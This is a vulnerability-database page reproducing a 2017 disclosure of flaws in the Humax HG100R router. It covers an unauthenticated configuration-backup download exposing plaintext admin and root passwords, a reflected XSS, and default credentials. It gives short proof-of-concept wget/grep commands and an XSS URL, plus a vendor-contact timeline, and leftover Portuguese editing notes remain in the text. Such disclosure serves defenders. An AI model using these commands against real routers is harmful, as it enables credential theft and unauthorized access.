Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormThe GamblerPACKETSTORM:143227
HistoryJul 03, 2017 - 12:00 a.m.

Humax Digital HG100R 2.0.6 XSS / Information Disclosure

2017-07-0300:00:00
The Gambler
packetstormsecurity.com
58

0.004 Low

EPSS

Percentile

74.8%

JSON
`Humax Digital HG100R multiple vulnerabilities  
Device: Humax HG100R  
Software Version: VER 2.0.6  
  
- Backup file download (CVE-2017-7315)  
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to provide ADSL internet service to household and small business users. (CHECA ESSA INFO)  
To download the backup file it's not required the use of credentials or any authentication, and the router credentials are stored in plaintext inside the backup.  
  
PoC  
wget http://192.168.0.1/view/basic/GatewaySettings.bin  
strings GatewaySettings.bin | grep -A 1 admin  
--------------------------------------------------------------------------------  
  
- XSS Reflected(CVE-2017-7316)  
An issue was discovered on Humax Digital HG100R 2.0.6 devices. DESCREVE BREVEMENTE O QUE A XSS REFLECTED E FALA O QUE PODE FAZER COM O USUARIO USANDO ISSO.  
There is XSS reflected on the 404 page.  
  
PoC  
http://192.168.0.1<script>alert('XSS')</script>  
--------------------------------------------------------------------------------  
  
- Default credentials to router's web application not declared in the manual(CVE-2017-7317) NAO ENTENDI ESSA FRASE. QUE QUIS DIZER?  
An issue was discovered on Humax Digital HG100 2.0.6 devices.  
The attacker can find the root credentials in the backup file.  
  
PoC  
wget http://192.168.0.1/view/basic/GatewaySettings.bin  
strings GatewaySettings.bin | grep -A 1 root  
  
  
Timeline  
2017-03-15 - First contact. Ignored by the vendor.  
2017-03-21 - Second contact.  
2017-03-22 - The vendor answered asking about the vulnerability.  
2017-03-27 - Asked the vendor about his security team contact informarion to report the vulnerability.  
2017-03-28 - The vendor answered saying that it is an old product, and they will check this vulnerabilities in the news products.  
2017-03-28 - Ask the vendor about a patch.  
2017-03-30 - Ask the vendor again about the patch.  
2017-04-03 - Notified the vendor about the disclousure after 90 days, even without a patch.  
2017-04-19 - Ask the vendor about a patch.  
2017-05-08 - Ask the vendor about a patch.  
2017-06-29 - Disclosure.  
  
  
  
`

Related

openvas 1
prion 3
cvelist 3
nvd 3
cve 3
exploitpack 1
exploitdb 1
openvas
openvas
HUMAX Gateway Backup File Download Vulnerability
2017-07-03 00:00:00
prion
prion
Cross site scripting
2017-07-04 02:29:00
Default credentials
2017-07-04 02:29:00
Design/Logic Flaw
2017-07-04 02:29:00
cvelist
cvelist
CVE-2017-7316
2017-07-04 02:00:00
CVE-2017-7315
2017-07-04 02:00:00
CVE-2017-7317
2017-07-04 02:00:00
nvd
nvd
CVE-2017-7316
2017-07-04 02:29:00
CVE-2017-7315
2017-07-04 02:29:00
CVE-2017-7317
2017-07-04 02:29:00
cve
cve
CVE-2017-7316
2017-07-04 02:29:00
CVE-2017-7315
2017-07-04 02:29:00
CVE-2017-7317
2017-07-04 02:29:00
exploitpack
exploitpack
Humax HG100R 2.0.6 - Backup File Download
2017-06-30 00:00:00
exploitdb
exploitdb
Humax HG100R 2.0.6 - Backup File Download
2017-06-30 00:00:00

0.004 Low

EPSS

Percentile

74.8%

JSON
Related for PACKETSTORM:143227
openvas1prion3cvelist3nvd3cve3exploitpack1exploitdb1